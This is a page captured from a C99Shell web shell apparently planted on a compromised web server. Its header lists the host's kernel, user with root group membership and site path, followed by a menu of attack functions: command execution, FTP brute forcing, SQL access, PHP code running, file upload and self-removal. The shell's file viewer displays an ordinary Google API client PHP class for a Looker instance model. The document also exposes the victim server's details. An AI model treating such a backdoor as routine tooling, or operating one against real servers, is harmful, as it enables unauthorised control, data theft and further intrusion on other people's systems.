!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/google/apiclient-services/src/Looker/   drwxr-xr-x
Free 29.16 GB of 117.98 GB (24.72%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Instance.php (8.67 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

namespace Google\Service\Looker;

class 
Instance extends \Google\Model
{
  protected 
$adminSettingsType AdminSettings::class;
  protected 
$adminSettingsDataType '';
  
/**
   * @var string
   */
  
public $consumerNetwork;
  
/**
   * @var string
   */
  
public $createTime;
  protected 
$customDomainType CustomDomain::class;
  protected 
$customDomainDataType '';
  protected 
$denyMaintenancePeriodType DenyMaintenancePeriod::class;
  protected 
$denyMaintenancePeriodDataType '';
  
/**
   * @var string
   */
  
public $egressPublicIp;
  protected 
$encryptionConfigType EncryptionConfig::class;
  protected 
$encryptionConfigDataType '';
  
/**
   * @var string
   */
  
public $ingressPrivateIp;
  
/**
   * @var string
   */
  
public $ingressPublicIp;
  protected 
$lastDenyMaintenancePeriodType DenyMaintenancePeriod::class;
  protected 
$lastDenyMaintenancePeriodDataType '';
  
/**
   * @var string
   */
  
public $linkedLspProjectNumber;
  
/**
   * @var string
   */
  
public $lookerUri;
  
/**
   * @var string
   */
  
public $lookerVersion;
  protected 
$maintenanceScheduleType MaintenanceSchedule::class;
  protected 
$maintenanceScheduleDataType '';
  protected 
$maintenanceWindowType MaintenanceWindow::class;
  protected 
$maintenanceWindowDataType '';
  
/**
   * @var string
   */
  
public $name;
  protected 
$oauthConfigType OAuthConfig::class;
  protected 
$oauthConfigDataType '';
  
/**
   * @var string
   */
  
public $platformEdition;
  
/**
   * @var bool
   */
  
public $privateIpEnabled;
  
/**
   * @var bool
   */
  
public $publicIpEnabled;
  
/**
   * @var string
   */
  
public $reservedRange;
  
/**
   * @var string
   */
  
public $state;
  
/**
   * @var string
   */
  
public $updateTime;
  protected 
$userMetadataType UserMetadata::class;
  protected 
$userMetadataDataType '';

  
/**
   * @param AdminSettings
   */
  
public function setAdminSettings(AdminSettings $adminSettings)
  {
    
$this->adminSettings $adminSettings;
  }
  
/**
   * @return AdminSettings
   */
  
public function getAdminSettings()
  {
    return 
$this->adminSettings;
  }
  
/**
   * @param string
   */
  
public function setConsumerNetwork($consumerNetwork)
  {
    
$this->consumerNetwork $consumerNetwork;
  }
  
/**
   * @return string
   */
  
public function getConsumerNetwork()
  {
    return 
$this->consumerNetwork;
  }
  
/**
   * @param string
   */
  
public function setCreateTime($createTime)
  {
    
$this->createTime $createTime;
  }
  
/**
   * @return string
   */
  
public function getCreateTime()
  {
    return 
$this->createTime;
  }
  
/**
   * @param CustomDomain
   */
  
public function setCustomDomain(CustomDomain $customDomain)
  {
    
$this->customDomain $customDomain;
  }
  
/**
   * @return CustomDomain
   */
  
public function getCustomDomain()
  {
    return 
$this->customDomain;
  }
  
/**
   * @param DenyMaintenancePeriod
   */
  
public function setDenyMaintenancePeriod(DenyMaintenancePeriod $denyMaintenancePeriod)
  {
    
$this->denyMaintenancePeriod $denyMaintenancePeriod;
  }
  
/**
   * @return DenyMaintenancePeriod
   */
  
public function getDenyMaintenancePeriod()
  {
    return 
$this->denyMaintenancePeriod;
  }
  
/**
   * @param string
   */
  
public function setEgressPublicIp($egressPublicIp)
  {
    
$this->egressPublicIp $egressPublicIp;
  }
  
/**
   * @return string
   */
  
public function getEgressPublicIp()
  {
    return 
$this->egressPublicIp;
  }
  
/**
   * @param EncryptionConfig
   */
  
public function setEncryptionConfig(EncryptionConfig $encryptionConfig)
  {
    
$this->encryptionConfig $encryptionConfig;
  }
  
/**
   * @return EncryptionConfig
   */
  
public function getEncryptionConfig()
  {
    return 
$this->encryptionConfig;
  }
  
/**
   * @param string
   */
  
public function setIngressPrivateIp($ingressPrivateIp)
  {
    
$this->ingressPrivateIp $ingressPrivateIp;
  }
  
/**
   * @return string
   */
  
public function getIngressPrivateIp()
  {
    return 
$this->ingressPrivateIp;
  }
  
/**
   * @param string
   */
  
public function setIngressPublicIp($ingressPublicIp)
  {
    
$this->ingressPublicIp $ingressPublicIp;
  }
  
/**
   * @return string
   */
  
public function getIngressPublicIp()
  {
    return 
$this->ingressPublicIp;
  }
  
/**
   * @param DenyMaintenancePeriod
   */
  
public function setLastDenyMaintenancePeriod(DenyMaintenancePeriod $lastDenyMaintenancePeriod)
  {
    
$this->lastDenyMaintenancePeriod $lastDenyMaintenancePeriod;
  }
  
/**
   * @return DenyMaintenancePeriod
   */
  
public function getLastDenyMaintenancePeriod()
  {
    return 
$this->lastDenyMaintenancePeriod;
  }
  
/**
   * @param string
   */
  
public function setLinkedLspProjectNumber($linkedLspProjectNumber)
  {
    
$this->linkedLspProjectNumber $linkedLspProjectNumber;
  }
  
/**
   * @return string
   */
  
public function getLinkedLspProjectNumber()
  {
    return 
$this->linkedLspProjectNumber;
  }
  
/**
   * @param string
   */
  
public function setLookerUri($lookerUri)
  {
    
$this->lookerUri $lookerUri;
  }
  
/**
   * @return string
   */
  
public function getLookerUri()
  {
    return 
$this->lookerUri;
  }
  
/**
   * @param string
   */
  
public function setLookerVersion($lookerVersion)
  {
    
$this->lookerVersion $lookerVersion;
  }
  
/**
   * @return string
   */
  
public function getLookerVersion()
  {
    return 
$this->lookerVersion;
  }
  
/**
   * @param MaintenanceSchedule
   */
  
public function setMaintenanceSchedule(MaintenanceSchedule $maintenanceSchedule)
  {
    
$this->maintenanceSchedule $maintenanceSchedule;
  }
  
/**
   * @return MaintenanceSchedule
   */
  
public function getMaintenanceSchedule()
  {
    return 
$this->maintenanceSchedule;
  }
  
/**
   * @param MaintenanceWindow
   */
  
public function setMaintenanceWindow(MaintenanceWindow $maintenanceWindow)
  {
    
$this->maintenanceWindow $maintenanceWindow;
  }
  
/**
   * @return MaintenanceWindow
   */
  
public function getMaintenanceWindow()
  {
    return 
$this->maintenanceWindow;
  }
  
/**
   * @param string
   */
  
public function setName($name)
  {
    
$this->name $name;
  }
  
/**
   * @return string
   */
  
public function getName()
  {
    return 
$this->name;
  }
  
/**
   * @param OAuthConfig
   */
  
public function setOauthConfig(OAuthConfig $oauthConfig)
  {
    
$this->oauthConfig $oauthConfig;
  }
  
/**
   * @return OAuthConfig
   */
  
public function getOauthConfig()
  {
    return 
$this->oauthConfig;
  }
  
/**
   * @param string
   */
  
public function setPlatformEdition($platformEdition)
  {
    
$this->platformEdition $platformEdition;
  }
  
/**
   * @return string
   */
  
public function getPlatformEdition()
  {
    return 
$this->platformEdition;
  }
  
/**
   * @param bool
   */
  
public function setPrivateIpEnabled($privateIpEnabled)
  {
    
$this->privateIpEnabled $privateIpEnabled;
  }
  
/**
   * @return bool
   */
  
public function getPrivateIpEnabled()
  {
    return 
$this->privateIpEnabled;
  }
  
/**
   * @param bool
   */
  
public function setPublicIpEnabled($publicIpEnabled)
  {
    
$this->publicIpEnabled $publicIpEnabled;
  }
  
/**
   * @return bool
   */
  
public function getPublicIpEnabled()
  {
    return 
$this->publicIpEnabled;
  }
  
/**
   * @param string
   */
  
public function setReservedRange($reservedRange)
  {
    
$this->reservedRange $reservedRange;
  }
  
/**
   * @return string
   */
  
public function getReservedRange()
  {
    return 
$this->reservedRange;
  }
  
/**
   * @param string
   */
  
public function setState($state)
  {
    
$this->state $state;
  }
  
/**
   * @return string
   */
  
public function getState()
  {
    return 
$this->state;
  }
  
/**
   * @param string
   */
  
public function setUpdateTime($updateTime)
  {
    
$this->updateTime $updateTime;
  }
  
/**
   * @return string
   */
  
public function getUpdateTime()
  {
    return 
$this->updateTime;
  }
  
/**
   * @param UserMetadata
   */
  
public function setUserMetadata(UserMetadata $userMetadata)
  {
    
$this->userMetadata $userMetadata;
  }
  
/**
   * @return UserMetadata
   */
  
public function getUserMetadata()
  {
    return 
$this->userMetadata;
  }
}

// Adding a class alias for backwards compatibility with the previous class name.
class_alias(Instance::class, 'Google_Service_Looker_Instance');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--